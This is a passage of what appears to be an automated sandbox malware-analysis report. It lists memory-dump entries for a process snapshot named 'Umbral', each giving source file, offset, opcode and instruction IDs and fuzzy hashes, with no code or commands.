                                        • Instruction Fuzzy Hash: C1212236C0C95E0EF7B4B66458012FD73E0FFA5390F840176D81CC3082DF3A291A4AA9
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7b48dd04150eae31d5c6ac8afb9e0177c990d067aa96360669cc486dd4759f38
                                        • Instruction ID: d7b39bd88979a4f2c0bbc7b5f333f6ebedac3db0b84aafeca8db5bbd238f75c9
                                        • Opcode Fuzzy Hash: 7b48dd04150eae31d5c6ac8afb9e0177c990d067aa96360669cc486dd4759f38
                                        • Instruction Fuzzy Hash: 4831FE74A1995E8FDBC4EF18C494AA977E2FF58340F5446A4E41DC729ADF34E842CB40
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a3de77c9bd8aaf5f4c862960e2f3c876d22970b65c0540f1b52da89e2b25b3fd
                                        • Instruction ID: 3c030d7e8eb2847726ae519374acf7d521ce9ca9b47230a1038aacad7bdaef28
                                        • Opcode Fuzzy Hash: a3de77c9bd8aaf5f4c862960e2f3c876d22970b65c0540f1b52da89e2b25b3fd
                                        • Instruction Fuzzy Hash: 3D31052150EBCA4FD793FBA884505A27FE1FF67264B4941FAC04CCB153CA68AC4AC351
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a229fc5f4ba1c12d1e73e988fac4d4936bc91d67a143780d68fce89bf9e8f3fc
                                        • Instruction ID: 30af3f727802f8e721503e1e9da3a73a41bf56bfa47ce48ac5de379016609fc2
                                        • Opcode Fuzzy Hash: a229fc5f4ba1c12d1e73e988fac4d4936bc91d67a143780d68fce89bf9e8f3fc
                                        • Instruction Fuzzy Hash: F921A521B1CD064FEAA4E65E64D537953C3FFA8691F4401BBD41CC3299DF39EC428285
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 68bc5bc0e2753363682e262670bc96039baad8fe9bf932db584f128cbbea2c6a
                                        • Instruction ID: 2372f04679672414628dd5f990483a74736b6fa398dccb3da6815047478d52a9
                                        • Opcode Fuzzy Hash: 68bc5bc0e2753363682e262670bc96039baad8fe9bf932db584f128cbbea2c6a
                                        • Instruction Fuzzy Hash: A921C321F2CD4A4FEAE8F62D5445A7663C1FBA87A4F4405BAD00EC3696CE28BC464384
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 899db497471488bc4e814faf02dc421963b2837424c3096eb388b18e3a0f7cda
                                        • Instruction ID: 9ee6e2533bca354325e4a613e97db23d42650eaaa32d40bf6dbd4a567f71ba5b
                                        • Opcode Fuzzy Hash: 899db497471488bc4e814faf02dc421963b2837424c3096eb388b18e3a0f7cda
                                        • Instruction Fuzzy Hash: 38212911D1DA861FE32B627824511B97BD1EF472A0F5802FAD4C9C30D7DD1D68064365
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d592da858de8cd1c4d18b6a613d1457625f861b4bdcdbcbc13c4bd3db9db4058
                                        • Instruction ID: 6748ff6034e0906e71223b91c25446211948f7fd866e0aff07ea1f76b6a5115b
                                        • Opcode Fuzzy Hash: d592da858de8cd1c4d18b6a613d1457625f861b4bdcdbcbc13c4bd3db9db4058
                                        • Instruction Fuzzy Hash: C2212F21A9DA994FE781B77898252F53BE1EF96350F0901F6E04CC71A3DE2C58078755
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b0d04ef009c0cb28cf534b276556999584f260a198e0d29776a62d01380ae6dd
                                        • Instruction ID: 39a56845351d28f6bd937bc248d347dd6c3ad42e7ce5053ca1754651e475663a
                                        • Opcode Fuzzy Hash: b0d04ef009c0cb28cf534b276556999584f260a198e0d29776a62d01380ae6dd
                                        • Instruction Fuzzy Hash: D221F931A0CF181FE658B61D984A47A73D0FB987A1F00027EE44AC3261EE34B88247C6
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b7b5ff7b2ad7a0eeffa601970183cf50be65c47d53bf7f6dc5c81424aa45c054
                                        • Instruction ID: 53e586d08d67950b9e79f820d67193e215c0698da0022e1a7b5e2e32058a4473
                                        • Opcode Fuzzy Hash: b7b5ff7b2ad7a0eeffa601970183cf50be65c47d53bf7f6dc5c81424aa45c054
                                        • Instruction Fuzzy Hash: 64318430D0DB9E9FD796AB3888152A8BBB0FF0E350F8505FAD409DB1A3DB3919848755
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 631c86b03b51990f103ecb6486438fddb1c27023245d9967f942de22f0eed328
                                        • Instruction ID: 960b7f4dd5ffcb95cf00d5bd86941bc1d13642d3ad638ad0b0c636265766aacc
                                        • Opcode Fuzzy Hash: 631c86b03b51990f103ecb6486438fddb1c27023245d9967f942de22f0eed328
                                        • Instruction Fuzzy Hash: 0D21C531B1CE5E4FE694B67C545A675B7D2EB896A4F0401FAE40DC3293DE289C428385
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 52a19a36c118f48957f7bce9001e367562f6ca2dcdabdf786e418ade92b3030c
                                        • Instruction ID: 9ec7023826ebf6da1e1f25f3faaf9efb44a3cb6348d572678e568a5b1f4a8e73
                                        • Opcode Fuzzy Hash: 52a19a36c118f48957f7bce9001e367562f6ca2dcdabdf786e418ade92b3030c
                                        • Instruction Fuzzy Hash: CD216D3071CD099FDA9CEA2CD849A7577E1FBA9350B1001AEE40EC36A6DF25EC468744
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 71b644fdf0862428a17c1a5d5cb6aab91a2501d3cb2585d8bd3d2982e7a061d3
                                        • Instruction ID: 2137bec4ea59be73b0f23f8170c7a93e6855bad9b4d1e4472f53c7c220eb6948
                                        • Opcode Fuzzy Hash: 71b644fdf0862428a17c1a5d5cb6aab91a2501d3cb2585d8bd3d2982e7a061d3
                                        • Instruction Fuzzy Hash: 8821E13091D7C64FD756E73888148657BE0FF96361B0A41BBE48ACB1A3DF28D801C746
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fe3683a1393b02bbc99a1a29f695d98d947cffde14780cbb342fc2dbe17b94e9
                                        • Instruction ID: fc2581aa0dfb4f9196fba6d997b7044dde081add64e57391e24113fd85133d92
                                        • Opcode Fuzzy Hash: fe3683a1393b02bbc99a1a29f695d98d947cffde14780cbb342fc2dbe17b94e9
                                        • Instruction Fuzzy Hash: 4F21D43190DA898FD785EBA8C4556EA7BF1FF4A350F0541EAD048CB2A3CB3859068B61
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3ce9edf1545203a83c0a5587eeac0c6393cdf8e391cbf63f50aa1d14b5e74d0a
                                        • Instruction ID: 3d592ceb7fa3ff4a6ba051554e1fb49739a92b2b4aff638316f91c147ffd6b38
                                        • Opcode Fuzzy Hash: 3ce9edf1545203a83c0a5587eeac0c6393cdf8e391cbf63f50aa1d14b5e74d0a
                                        • Instruction Fuzzy Hash: C921D8A1D4EA867EE70AB778A4551FD7FA0EF02268F0C91B7D44CCA093EF2814458759
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f572611004b68322eba817619f8db62cd245880bcdcad700a0906d84448d0482
                                        • Instruction ID: d9fb9c042532876367692d331d3b74c642b39f6b6673bc3b03e679486b255fe5
                                        • Opcode Fuzzy Hash: f572611004b68322eba817619f8db62cd245880bcdcad700a0906d84448d0482
                                        • Instruction Fuzzy Hash: C311D621F1CD5E5FE654F66C545A675A3C2FB4C7A0F1405BAE40DC3296DE24AC414385
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8fa36ac78e9cf722d6a5f27448c0098b34c8e9eb6b150e6f379bc67001442e23
                                        • Instruction ID: 9c9d62872e24458e6bcb0a24eb3d330fbef6faea36a537639e3d523ecbe2685d
                                        • Opcode Fuzzy Hash: 8fa36ac78e9cf722d6a5f27448c0098b34c8e9eb6b150e6f379bc67001442e23
                                        • Instruction Fuzzy Hash: 7A11C030A0CA194FFB9CAA08D8497B672D1FB91365F24007EE44EC6182DB36EC83D784
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 06698e45ffce1aa28aee78e9588a910bd81d7d0f506527d274356192bf0574b1
                                        • Instruction ID: 3c541fcfee14ad77d9ff752bfa7104a58e681e35d6bb195206f2e9bf8f5e7a2d
                                        • Opcode Fuzzy Hash: 06698e45ffce1aa28aee78e9588a910bd81d7d0f506527d274356192bf0574b1
                                        • Instruction Fuzzy Hash: E321CD22D0C99A4EF7A4B62858222F976D1FF893A0F4401B6DA1CC34C2DF28691A4685
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5512e5aff1d6755ddd67f17b54b82a027f535e75c915bb186d01d404fbea21fa
                                        • Instruction ID: ce9b49f70ae02cabf5bcd6ba69f37be874b0c8f594be072ce48606ed0ef56a20
                                        • Opcode Fuzzy Hash: 5512e5aff1d6755ddd67f17b54b82a027f535e75c915bb186d01d404fbea21fa
                                        • Instruction Fuzzy Hash: 9A218E22D0C99A4EF7A5B62CD8152BD7AE1FF45391F8811B6D45CC71C2DF28680A4A85
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9abc2bf0c6b2ad736f69d2b69295e89e622e20e8ca325895402225d9ad1e06d8
                                        • Instruction ID: 6d3b81c3999055e3c256cea6d0ee5fe03003d2c86e1a78f58efa7befca5f8fb0
                                        • Opcode Fuzzy Hash: 9abc2bf0c6b2ad736f69d2b69295e89e622e20e8ca325895402225d9ad1e06d8
                                        • Instruction Fuzzy Hash: 3E21DE36D0C89E8EFBB8B66858112FD36D1FF853A1F840176D41EC35C2EE3A690A0685
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 85d844d766fe44b69ca3fc1c5f34e5d7c2af8d6b5e8d62dd4f88b0296dd2db7b
                                        • Instruction ID: f96c2fc417753295087c0d2aae989b614d093ac30b839c91d156aed1be7fcab0
                                        • Opcode Fuzzy Hash: 85d844d766fe44b69ca3fc1c5f34e5d7c2af8d6b5e8d62dd4f88b0296dd2db7b
                                        • Instruction Fuzzy Hash: BD21DE36C1C99A4FF7A6B63858152BD7AD0FF46390F8801BAD45CD34D7DF38280A8689
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 603d7887e34ddd32640200fd809755a12f30f57bbb3da6690379dfd8d06ac4c2
                                        • Instruction ID: 5951a25b136d3316c337256723ba61f6827b29c6565f03266a130e77ff26ecd7
                                        • Opcode Fuzzy Hash: 603d7887e34ddd32640200fd809755a12f30f57bbb3da6690379dfd8d06ac4c2
                                        • Instruction Fuzzy Hash: 4121DF36D1C95E4EF7A4B62858122FD76E1FF8A395F84017AD51CC30C2EF39691A068A
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b41d73fb07ba0b7ba8bb155c8afdd5ec93c2ef0bd68be2e62e48828614d30ad4
                                        • Instruction ID: a7f22e91fa6cc75526f44bb0156354782ac211962547221ced7c67900d838293
                                        • Opcode Fuzzy Hash: b41d73fb07ba0b7ba8bb155c8afdd5ec93c2ef0bd68be2e62e48828614d30ad4
                                        • Instruction Fuzzy Hash: AE21D122D0C99E4EF7A4B66848112FDB7E0FFC53A0F8801B6D45CC7087DF386809468A
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f55c9227200446d7279066a4499bea0385e9230a03bc156de8cfa135e9b905f2
                                        • Instruction ID: f16d45377ee83f15f9bfa12a7b65b28b219b4d9a95c12776697060ba6f443ef5
                                        • Opcode Fuzzy Hash: f55c9227200446d7279066a4499bea0385e9230a03bc156de8cfa135e9b905f2
                                        • Instruction Fuzzy Hash: 8B21C632D0D9994EF775B32448112BD7AE0FF453A2F8801BAD45EC3493DF38681A4685
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7f266d500e6f7bf84a8d5571c1648db6339afc5fbbaa751000a89436a91a2bbf
                                        • Instruction ID: fd56bf7edbcf21f69feff3bd816599bcd22e1b860b8eb6fba83337485af65132
                                        • Opcode Fuzzy Hash: 7f266d500e6f7bf84a8d5571c1648db6339afc5fbbaa751000a89436a91a2bbf
                                        • Instruction Fuzzy Hash: E611E43191CE851FD74CE61884465BA76D1FBE9350F04507EF08FC32D7DE75A8058246
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dcbcaf56389b980692ab8b3acb4bf71c63fac2655ddd3fb42f07d645703e1986
                                        • Instruction ID: bde89f056bd13ee4bb7ccff115e4532a0e54e00ca659372b967f6292b5b0b890
                                        • Opcode Fuzzy Hash: dcbcaf56389b980692ab8b3acb4bf71c63fac2655ddd3fb42f07d645703e1986
                                        • Instruction Fuzzy Hash: DA216730718E095FDAA8FB2CD458F6573E1FF98740F5141BAE40EC72A6DE21AC808784
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5fcda8df12a673b1ee26838905cb06ec54101d891e1fd16cb3dde33c8a522cc6
                                        • Instruction ID: 2802ac226576de12b78cd151d3387b21aa39eef4835c2a5e2c7c94594014dc9c
                                        • Opcode Fuzzy Hash: 5fcda8df12a673b1ee26838905cb06ec54101d891e1fd16cb3dde33c8a522cc6
                                        • Instruction Fuzzy Hash: 3721B032D0D9AA4DF7B4B22458111B976E0FF653A0F4801BAD45CC2683EF78690B578D
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0aaa4e4310d32a252d36d5bdbdc50b2125226f3d1bfe63b385cf07d344825769
                                        • Instruction ID: a3b38480f22e8d8b95f897178874d7d66b3a00bc284d8c74be8e7958ee85f0bc
                                        • Opcode Fuzzy Hash: 0aaa4e4310d32a252d36d5bdbdc50b2125226f3d1bfe63b385cf07d344825769
                                        • Instruction Fuzzy Hash: 48213531D0C99A0EF7B4B6ACD8152B9B7E0FF84398F4411B6D45CC30A3EF79690A4685
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 73d6f16458a1a0187f9a0034a4475683e48348d3c828f19bf8f48079858e2715
                                        • Instruction ID: d0e17c328616f4349302f05b117acf43304bc590f3166444f739e9702fa04297
                                        • Opcode Fuzzy Hash: 73d6f16458a1a0187f9a0034a4475683e48348d3c828f19bf8f48079858e2715
                                        • Instruction Fuzzy Hash: F621C336D0C99E8EFB64B2A448112B976D1FF453A8F4801FAD45CC71C3DFBD68198685
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b7deb042c68e4fe62924604412eefc920f5c157bda69b18a86f6e2b68001e17e
                                        • Instruction ID: 0fd1f94d89eb7b60bb2f11d679aac32ac661ed0652f939f97e14115659b9b029
                                        • Opcode Fuzzy Hash: b7deb042c68e4fe62924604412eefc920f5c157bda69b18a86f6e2b68001e17e
                                        • Instruction Fuzzy Hash: 9321D63194E6C95FC7429BB48C556ED7FF4EF4B250B0541E7E088C71A3CA2C5946CBA1
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7ddb0ad71382a242e7088768f9fbc54ae1d4ac3024d673df69848e5e621d6444
                                        • Instruction ID: 6df2e75a6c6e860fcd17fcfebf1071957fa4c147a4758925046fa720929d5405
                                        • Opcode Fuzzy Hash: 7ddb0ad71382a242e7088768f9fbc54ae1d4ac3024d673df69848e5e621d6444
                                        • Instruction Fuzzy Hash: 4521F036C0D99E0EF7A5B62848212BD36E0FF45398F8501B6D82CC34C3EF3E68194285
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 060f9c1847eaa82ddde1c3a26070f3760bc92800154139e183e9ad55737d03d8
                                        • Instruction ID: 35dd7494b7afad20ea6abbca890795408c9e7f5b8db93a86fdbf10a5014b0ba6
                                        • Opcode Fuzzy Hash: 060f9c1847eaa82ddde1c3a26070f3760bc92800154139e183e9ad55737d03d8
                                        • Instruction Fuzzy Hash: 0A11C031F18E0A4FD6A8EA2C9454676A3D1FFD4750F14477AC05EC3286DF39E8428784
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 68e0f0c7e765652a5733a3fea0c79480806d18e398064570e217058da958ccf6
                                        • Instruction ID: a068bbd0e4cd6f08d0cc4732f400e17e339173f05cab8d0a46f4750bef5ac6cc
                                        • Opcode Fuzzy Hash: 68e0f0c7e765652a5733a3fea0c79480806d18e398064570e217058da958ccf6
                                        • Instruction Fuzzy Hash: 68115132B0CD0A4FE6A8F61DA48877563D1FBE8360F1842B6D40DC7295DE35EC828744
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ba69f21eb6de2fac19a7e6e46773692f310fb2dd0ced27ef4acaf785b0a6404a
                                        • Instruction ID: b799e587b359c69e5d2aa681b4a676be4db6b60fbfb06cada84fcdf823917a16
                                        • Opcode Fuzzy Hash: ba69f21eb6de2fac19a7e6e46773692f310fb2dd0ced27ef4acaf785b0a6404a
                                        • Instruction Fuzzy Hash: 68112511E2CE160EF678712C60952BE23C2FB493E4F50117EE58FC31C7DE2E68024289
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 220ef7a1eb77ac35845e08d85638081a934e6b91f65ba4f6622b80993acc9fb4
                                        • Instruction ID: 84be0586426a97fb47f75adaad9063af6fd75ac19d03e1aa76fbc2c0e6f56c63
                                        • Opcode Fuzzy Hash: 220ef7a1eb77ac35845e08d85638081a934e6b91f65ba4f6622b80993acc9fb4
                                        • Instruction Fuzzy Hash: 4A11B122D0DB969FEB91BB7868152603BE0FF5A7C8F1440F6D448CB1A3CB296C198356
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 835c72f49bacadf656ba90c7ac2c9d6b386cde1ae22d05f040a07b96fe2240a1
                                        • Instruction ID: 9157d7336260d7c7df17b9b791ea6a94147c7a575759c2727693b293e224f3bc
                                        • Opcode Fuzzy Hash: 835c72f49bacadf656ba90c7ac2c9d6b386cde1ae22d05f040a07b96fe2240a1
                                        • Instruction Fuzzy Hash: 0021382050D6C28FD7066B3458691B83FB1EF03350B2804FEC48AC74A3EB296856C345
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 458c95eebbdf7affb29ff6d03043032e389444b41c424c3ddaa576f956c12e37
                                        • Instruction ID: 549de3f68982feeb47b4de4c80bdc07a3ace7a989ff9e7937fde778eb7e31ca7
                                        • Opcode Fuzzy Hash: 458c95eebbdf7affb29ff6d03043032e389444b41c424c3ddaa576f956c12e37
                                        • Instruction Fuzzy Hash: 9D11E221D0DA5B8FFA94BB6C28142603BE0FF1A7C8F1400B5D84CC71A2CE262C494256
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2c5b7cf640bfe4a891a84743ac25659c06ab5272ee8d6a35ff7da57b7c88cd80
                                        • Instruction ID: e5935da9628f3ea974acdd3b7a06f6b8a216223b841b90080259584768fea90f
